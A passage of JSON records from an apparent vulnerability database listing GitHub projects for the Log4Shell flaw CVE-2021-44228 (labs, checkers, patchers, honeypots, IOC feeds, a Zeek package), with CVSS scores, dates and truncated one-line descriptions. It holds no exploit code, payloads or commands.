Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-06-17T15:17:52", "id": "62F5F8D4-29D7-5B5C-82BC-3D56E7E8D027", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-01-05T17:12:07", "description": "# Log4Shell docker lab for CVE-2021-44228\n\n## The components\nThi...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-18T19:30:35", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-05T14:55:14", "id": "B32ED3B3-2054-5776-B952-907BE2CBEED6", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-16T20:10:08", "description": "# Log4j Updater\n\nWith the inevitable need to update the famous J...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-15T04:08:15", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-16T17:25:55", "id": "4288177C-C609-5D55-A845-D6785929AB4D", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-19T11:57:01", "description": "# CVE-2021-44228\n\n[![Dockerfile](https://github.com/ahmad4fifz/C...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T12:30:11", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-05T08:46:03", "id": "977D06B3-F888-5FFF-8749-BF8AF7868ED6", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-17T20:07:41", "description": "# Log4Shell-IOCs\nIOC feeds curated by WatchGuard Threat Lab that...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-17T15:58:14", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-17T15:59:33", "id": "034AFC0C-D411-5F4A-BBAB-630A6C972933", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-01-11T13:19:29", "description": "# RASP CVE-2021-44228(Log4Shell)\n\n RASP for CVE-2021-44228 (**fo...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-21T13:30:37", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-10T11:47:39", "id": "F594470D-2599-5B2E-B317-C9720581C07D", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-01-03T14:21:10", "description": "# CVE-2021-44228 checker\n\nThis is the repository for checking fo...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-10T17:24:47", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-03T11:28:03", "id": "1CC6B535-3451-5066-8C2E-94551FEC545E", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-06-30T00:09:18", "description": "# log4j-jndi-be-gone\n\nA [Byte Buddy](https://bytebuddy.net/) Jav...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-12T15:29:20", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-06-29T19:16:09", "id": "066BA250-177D-5017-9AC2-6B948A465ABC", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-01-27T08:27:38", "description": "# Log4Shell sample vulnerable application (CVE-2021-44228)\n\nThis...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-27T07:07:30", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-27T07:10:06", "id": "926942FE-1507-5B71-9266-0A5EDC38EE50", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-15T14:08:10", "description": "# Security Log4J Tester\n\nA vulnerability in Apache Log4j, a wide...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-14T14:46:08", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-14T15:04:49", "id": "C45EBEA7-DE2F-5373-9AA5-334E20EA2D23", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-06-30T07:33:57", "description": "# Minecraft Log4j Honeypot\n\nThis honeypots runs fake Minecraft s...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-10T23:35:31", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-06-30T05:43:01", "id": "E6E03693-50B8-5AB4-B766-8464A228BA02", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-05-26T11:09:39", "description": "# Log4NoShell\nA runtime patcher that disables Apache Log4J's JND...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-10T21:59:31", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-05-26T08:53:08", "id": "0BC62E37-D6E2-5B2C-BF89-3E00D98D2E30", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-04-26T22:18:36", "description": "# Log4Shell (CVE-2021-44228) is a zero-day vulnerability in Log4...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-27T06:39:40", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-27T09:33:39", "id": "141F2E38-979B-50B5-B649-96785B255523", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-01-15T02:36:51", "description": "# CVE-2021-44228!\r\n\r\nThe current program remove the class \"org/...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T15:04:31", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-14T22:38:29", "id": "C1878361-BBB3-5A2F-8212-945883518690", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-27T08:07:19", "description": "# Log4j_Attacker_IPList\nCVE-2021...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-27T06:29:12", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-27T06:34:21", "id": "149F99C3-6B62-5255-8DA6-A0370E6ED5F7", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-09T12:01:39", "description": "# CVE-2021-44228\n\nA Zeek package which raises notices, tags HTTP...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T17:25:52", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-09T10:00:20", "id": "12AAE278-1B08-5F3E-AC28-8EC928D3D7C8", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-04-03T06:31:39", "description": "# Log4Shell Honeypot\n\nThis demo application is vulnerable to the...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-17T10:32:39", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-04-03T03:58:01", "id": "0ABA9FB5-93DD-59F1-9580-232DBFBB4AD8", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-14T17:16:31", "description": "<div align=\"center\">\n<h1>Log4j-0DayFix</h1>\n<h4>Plugin which fix...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-10T09:43:49", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-10T10:03:31", "id": "ACB6C453-F1D5-5A65-91C2-DF455B997075", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-17T17:55:41", "description": "# How-to-check-log4j-CVE-2021-44228\n![](./assets/log4jBanner.gif...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-15T07:51:28", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-17T16:19:51", "id": "7BB30379-8D57-5FD7-A90C-1A24B1846A23", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-14T17:15:17", "description": "## Log4j2\u590d\u73b0\u7b14\u8bb0\uff0c\u4ec5\u4f9b\u5b66\u4e60\n\u53c2\u8003https://github.com/tangxiaofeng7/CVE-2021-4...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-11T16:08:34", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-12T03:50:45", "id": "0099FB22-A94E-5D32-9BC4-2EC6D5CFFA9C", "href": "", "cvss": {"score": 9.3, "vector": 